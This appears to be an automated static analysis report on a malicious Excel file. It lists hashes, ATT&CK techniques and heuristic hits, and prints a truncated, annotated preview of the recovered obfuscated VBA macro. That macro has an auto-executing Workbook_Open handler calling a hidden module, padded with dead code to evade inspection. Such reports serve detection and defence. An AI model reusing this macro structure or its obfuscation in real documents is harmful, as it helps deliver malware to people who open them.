Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9d22c5ea5e22f92…

MALICIOUS

Office (OLE)

Size: 71.5 KB · Created: 2018-08-08 23:11:32 · Authoring application: Microsoft Excel · First seen: 2018-09-04
MD5: 1445105b285e05e44c3c4188dbb9d5b8 SHA-1: 497da46b37c01bbe068cfc224becf63a6bba532e SHA-256: a9d22c5ea5e22f928d79089fa28b6e74c5f4d7a12e2471a38749292a595edd75
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)

The file is an Excel document containing VBA macros, including a Workbook_Open handler that runs code as soon as the document is opened. CreateObject calls and auto-execution tokens found in the compiled p-code indicate an attempt to run arbitrary code. The recovered macro source is heavily obfuscated and the preview is truncated: the Workbook_Open handler's only live statement is a call into the module hON2A_nUTHCDjnNvg7_, surrounded by dead-code padding (comparisons of unequal string literals that can never be true, and declarations that are never used). That structure strongly suggests a downloader or dropper for a secondary payload, typical of macro-based malware delivery.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20484 bytes
SHA-256: db4b6debb0e8bf32402d9c845753fa3f3c56be50978f29d721073453546f459e
Detection
ClamAV: No threats found (signature-based check on the decoded macro text; a clean result here does not lower the heuristic verdict above)
Obfuscation or payload: likely
Carved artifact contains 5 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' [analyst note] Auto-executing handler (fires when the workbook opens; see the
' OLE_VBA_WBOPEN finding). The only live statement is the first line of the body,
' a call into the module hON2A_nUTHCDjnNvg7_ — presumably a procedure defined there,
' but its body lies beyond the truncated preview, so its behaviour cannot be read
' from this listing. Everything after that call is padding: each If compares two
' different string literals and is never entered, and none of the declared
' Worksheet/Date variables is referenced.
Private Sub workbook_open()
' [analyst note] The single statement that does anything.
hON2A_nUTHCDjnNvg7_.mYxoySaYQq_WXjWAmwOc
' [analyst note] Dead code from here to End Sub (unused declarations, unreachable branches).
Dim KlGSKvtpTZR_34mLISrtLaHtMnjK2rX3Lcs As Worksheet
If "APccCiuD1WDcd6JzS_eOsbW_fJhwlAYvYJl5pznJaWQUHIENp1_wqL9" = "g3W72_7Zy8QDRSNHbZTwUIA5UDSEu6kDKJDBR" Then
Dim vIc6aV1Ev4ZqkVVYlW1ajxp1o3UL2FNLzinISYqnDOPXnCTNqvhp As Date
End If
Dim JzQ8clOhAmMnnMzArK_LoLVTfPKkgFe_hhA_QoppHHlYAksZLS As Worksheet
If "fdpTA8b6ZKYn_3GGEEKzsBeXDei7R5" = "fuXMi_XMgCfTNdOdGrQ3emMUid9QPdXemennNvSF" Then
Dim r2gHSWvAGiWznYX2fCmDAF6Cn_qrykNUXIJmE_AKq8HqFhzL As Date
End If
Dim EuFKGN_k5dcRpCJfSAZcNuvaAaVC7N6EHclCcC As Worksheet
If "MH_hqkjqdnvlV_FV8S9oJo2BmohWIKZFBPwQXoCJ" = "zR6qOT1z9vdQDx2gOB5ABLgQLniEQx7RPxx1sIuRxqWVqHCLXNAVtBGl" Then
Dim tmdktuhIyJAO__xEPkLSxIjDkUpBwjhMoJF_oIgBHMgeFwL As Date
End If
Dim XZ5_GxwwiCY_W_eUNlvix3sYFDJJjlD6wGQk2dYY1VfANIH7m1R3TLXd As Worksheet
If "qd8DmlL78bKOv4ctKVrZVqI74MfrSJkisv3VfUu" = "NIhCv73IsWgp8d7G_SAHY_dmw1ke9_F" Then
Dim LzjcPwmW9ACwTucm_vn3BeKUHn5N4UWJrOTzVAoSU As Date
End If

Dim AGUQI2SLfsTEDqmMSk2Xbml2DDZmOCESgEcC_zdB5qxnylJlKHpDZ6bW As Worksheet
If "dcL_Zp6bl_h8MjMbEycux8Ba2xZFUA2jlEgfmXkNtTAyD" = "LXk5L7kbphfZuLlNyEkF7TFBqyqMN_b7KVoYyJHDPG6gA" Then
Dim K895NYqE1PiMWOVMp_hNWfLYm7fyyXi_k8dON_MgcOx As Date
End If
Dim GN7ux43OabzbntiPP22PaqikYtF9jzAtFrDIoKq55HFgudydnw7 As Worksheet
If "nk9UZoUUCw4nja_T5oYkDI6UQiAy44kSv3UGGUmcSznF_deEoH3" = "xMK2cnlD1meZGJj1q_7LiB5PMeyUwC5Hu_w_jA1beQvywYe5Ylx_r5" Then
Dim SuQ4n8yPPwrUnFWdPpMcqPOEbx_36I As Date
End If
Dim N5YypAvoV2mMA8FZtWg4UGuNMCeKay86TEhv6xZVqjRTybOP8ACkUAxE As Worksheet
If "IJkldjMf4q34YTd67IKuxYXuwNLYvViRQakt" = "Lx2FUvZGiTzmeFnJxCQsuzyNVxsgFil8rtrGQ_XB9PJaWi3oqXdNI29" Then
Dim V8ltgB2_9r25uWe3smNtdnV1w5Dyr_WwzuUI As Date
End If
Dim nTz9EOKsemFPKdtj4Fdrju6l8CQ3SD__B As Worksheet
If "TMXwOmMamTHwvlMTw3rPlh3WM_C8QXZhFN1OUvncOO7Ywy" = "JYDhfJVsXvTAiNjOIM3ipgu78_MM_VkbiXxl3r1" Then
Dim OKVyD4TLX2_EreLGmmEif6GrBI1ZIY7UZUmWRqpBmvyU_O27VOJ8vGTR As Date
End If
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "hON2A_nUTHCDjnNvg7_"
' [analyst note] Module-level state of hON2A_nUTHCDjnNvg7_, the module that
' workbook_open calls into: three String variables and one Integer. Nothing in
' the visible preview assigns or reads them, and the member invoked by
' workbook_open is past the truncation point, so their runtime contents cannot
' be determined from this listing.
Dim K8ApU4UxR73_DxT9Q_J7i2NJEsG5XU3GqewpdZM4OEbmkTaNvEp7jJf As String
Dim kFYRmxw1qx9eXj9jdnzpaOLCdT14zl9neFixl4ukdUfDF_87uHF As String
Dim E_4CukOrob3HLhSuFJn7n5aikfX1aXsseMy9__Hrf8pBLa_GKTRWU8PImSaMKXOPsIm9rSuEA5YpNYVIfPoF_TVg6oUph4eGqXRBxAX2iKUZhi4M7Qq5sHJWw_BC7DgFYP9yESTe2vf2969V As String
Dim ASSn3v9sszZVjeDgYNAsKiKQ5BlGzGs5DWThdIBIDKAPTUItzdc_7y_ZFAs1Hz3kEeQLJdCOKzn9h57h21QTms8MQ3ZbZJ_LRXIxC7iTaMwEI_2JDI8Qhg7UgC4 As Integer

 Function Dmw4C3B94moU2xy67C6tFuruP4C4N9hQ(bqbWhLElUinRLFA9e3ni_uBp6vatntvCYGw2UzF_xZib_ksEDPWz6sSpnuZuuU8kwk3DRHlnuntnKhkSCTpWU5FoxFLiYUMba7ocrov5msDP8odEIErYojN1dLOK5BMYYQLM3FkVgusl1yqH)
Dim QOghNblORpZuxBLkO8FeE5MOXXV_sn61X8z1RMnfEb_ As Worksheet
If "i5Bq_Ynkr35VBQHyElemtiUzJTRASiYmyOpcVn_R9SGeBcxA_xZb6" = "aL_iJfnFmQHcQfukobalKmYZzwqeP6dH6pWBo3KGTJUB9As7CYXU9zswwh" Then
Dim rVyGyqv9gkGs5uORP_QWZyCtb1fHI_6jNFJxRLUnN9cGxScl_oireYF As Date
End If
Dim RDo7Ilyangcxja_DnlGZT55HW4CceLDy9PdMgWdkIAcO As Worksheet
If "yoAmoeD2PpgWHeiNiT6ZbnxS6ufPGeP" = "RaoRq2Yx9HKgRrE_AwNBx_BwI1qp39vtuXN6" Then
Dim bK2VHf6QPFejzpdb2bbMX2GzJr5_UZu3cHkx523PHseCTEzKcS2Q5_fj As Date
End If
 Dim n3zbKUyAZ_vIehT4aj4x_iNg9WuoMeybPh_RxGgGZWtc8E2k7GD7rkq_nRcxiIw5NR37gA_RBuWkxth2dHq_a1toz4nenshOjyNoL5D6Ct57M_O4sjRY
Dim CAJYj56zTkFp_pg_iJ_oU_d_2rfBhb7bl_t3pboLwoqs As Worksheet
If "IFvu1rt51N8fEf2W3P1mmDD6mREd21pVuEr" = "ktOptLgtuuVi6wx3Wy_SEBzFglNC9gjt9x" Then
Dim PmmjFYERRIPsIqC8Rfoulh3GGG8duMJkiFfIOvrnMvspz As Date
End If
Dim xag9_NC
... (truncated)